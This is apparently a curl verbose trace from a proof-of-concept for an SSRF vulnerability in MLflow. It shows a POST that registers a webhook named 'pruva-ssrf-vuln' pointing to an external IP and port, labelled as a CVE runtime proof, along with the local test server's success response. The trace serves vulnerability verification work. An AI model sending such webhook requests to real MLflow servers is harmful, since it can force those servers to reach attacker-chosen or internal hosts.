* Trying 127.0.0.1:55013... * Established connection to 127.0.0.1 (127.0.0.1 port 55013) from 127.0.0.1 port 43452 * using HTTP/1.x => Send header, 156 bytes (0x9c) 0000: POST /api/2.0/mlflow/webhooks HTTP/1.1 0028: Host: 127.0.0.1:55013 003f: User-Agent: curl/8.18.0 0058: Accept: */* 0065: Content-Type: application/json 0085: Content-Length: 191 009a: => Send data, 191 bytes (0xbf) 0000: {"name":"pruva-ssrf-vuln","url":"https://93.184.216.34:8443/redi 0040: rect","events":[{"entity":"MODEL_VERSION","action":"CREATED"}]," 0080: description":"CVE-2026-64849 runtime proof","status":"ACTIVE"}. * upload completely sent off: 191 bytes <= Recv header, 17 bytes (0x11) 0000: HTTP/1.1 200 OK <= Recv header, 37 bytes (0x25) 0000: date: Tue, 18 Aug 2026 12:50:29 GMT <= Recv header, 17 bytes (0x11) 0000: server: uvicorn <= Recv header, 32 bytes (0x20) 0000: content-type: application/json <= Recv header, 21 bytes (0x15) 0000: content-length: 423 <= Recv header, 33 bytes (0x21) 0000: x-content-type-options: nosniff <= Recv header, 29 bytes (0x1d) 0000: x-frame-options: SAMEORIGIN <= Recv header, 2 bytes (0x2) 0000: <= Recv data, 423 bytes (0x1a7) 0000: {. "webhook": {. "webhook_id": "10e79ed2-969f-4daf-993a-80d3 0040: ab6d6c4d",. "name": "pruva-ssrf-vuln",. "description": "CV 0080: E-2026-64849 runtime proof",. "url": "https://93.184.216.34:8 00c0: 443/redirect",. "events": [. {. "entity": "MODEL_ 0100: VERSION",. "action": "CREATED". }. ],. "status 0140: ": "ACTIVE",. "creation_timestamp": 1787057429331,. "last_ 0180: updated_timestamp": 1787057429331. }.} * Connection #0 to host 127.0.0.1:55013 left intact